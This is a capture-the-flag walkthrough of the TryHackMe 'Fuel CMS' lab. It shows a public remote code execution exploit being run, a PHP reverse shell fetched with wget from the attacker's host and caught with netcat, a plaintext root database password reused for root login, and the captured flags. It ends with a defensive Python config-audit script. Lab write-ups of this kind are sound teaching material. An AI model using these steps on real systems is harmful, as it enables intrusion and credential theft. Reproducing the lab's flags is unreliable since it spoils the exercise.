Category: CTF
Posted at: Jan 28, 2024
We will go through the step-by-step process of solving the TryHackMe room titled "Fuel CMS."
Let's dive right in!
Nmap scan report for 10.10.42.50
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
The Nmap scan revealed that port 80 is open, running an Apache web server on an Ubuntu machine.
User-agent: *
Disallow: /fuel/
When I visited it, I was redirected to a login page. Using the identified CMS information, I searched for exploits related to Fuel CMS:
$ searchsploit Fuel
Fuel CMS 1.4.1 - Remote Code Execution (3) php/webapps/50477.py
$ searchsploit -m 50477
$ python3 50477.py -u http://10.10.42.50/
[+]Connecting...
Enter Command $pwd
system/var/www/html
I tried different commands in different languages to get a reverse shell but I had no success, so I downloaded a PHP reverse shell from my local machine and accessed it via the browser:
wget 10.8.5.105/rev.php
$ nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.8.105.5] from (UNKNOWN) [10.10.42.50] 37380
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:52:32 up 17 min, 0 users, load average: 1.05, 0.86, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
www-data@ubuntu:/home/www-data$ cat flag.txt
6470****************************
While exploring further, I found credentials in the database.php file:
'username' => 'root',
'password' => 'mememe',
Armed with the root user credentials, I successfully logged in as the root user and located the root flag:
root@ubuntu:~# cat root.txt
b9bbcb33e11b80be759c4e844862482d
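The database.php finding above is the kind of misconfiguration a defender can check for before deployment. The following is an added example, not part of the original write-up or of Fuel CMS: a small audit of a PHP database config against the local account list. The sample config layout, the passwd lines, the finding names and the 12-character threshold are assumptions made for illustration.

```python
import re

# Constructed sample: only the username/password lines come from the write-up;
# the array layout and the other keys are assumptions for illustration.
SAMPLE_DATABASE_PHP = """<?php
// 'password' => 'old-commented-out',
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'example_db',
);
"""
# Constructed passwd(5)-style lines standing in for /etc/passwd.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"

PAIR = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
DB_SUPERUSERS = {"root", "sa", "postgres", "admin"}
NOLOGIN = ("nologin", "false")

def parse_settings(php_text):
    """Return key => value string literals, ignoring PHP comments."""
    text = re.sub(r"/\*.*?\*/", "", php_text, flags=re.S)
    lines = [l for l in text.splitlines() if not l.lstrip().startswith(("//", "#"))]
    return dict(PAIR.findall("\n".join(lines)))

def login_accounts(passwd_text):
    """Names of local accounts whose shell allows interactive login."""
    rows = (l.split(":") for l in passwd_text.splitlines() if l.count(":") == 6)
    return {r[0] for r in rows if not r[6].endswith(NOLOGIN)}

def audit(php_text, passwd_text):
    cfg = parse_settings(php_text)
    user, pw = cfg.get("username", ""), cfg.get("password", "")
    findings = []
    if pw:
        findings.append("HARDCODED_PASSWORD")  # literal secret readable by the web user
    if user in DB_SUPERUSERS:
        findings.append("DB_SUPERUSER")  # application connects with full DB privileges
    if user in login_accounts(passwd_text):
        findings.append("MATCHES_LOGIN_ACCOUNT")  # password reuse would expose the OS account
    if pw and (len(pw) < 12 or pw.isalpha() or pw.isdigit()):
        findings.append("WEAK_PASSWORD")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_DATABASE_PHP, SAMPLE_PASSWD):
        print(finding)
```

A config that uses a dedicated low-privilege database account and reads its password from the environment produces no findings.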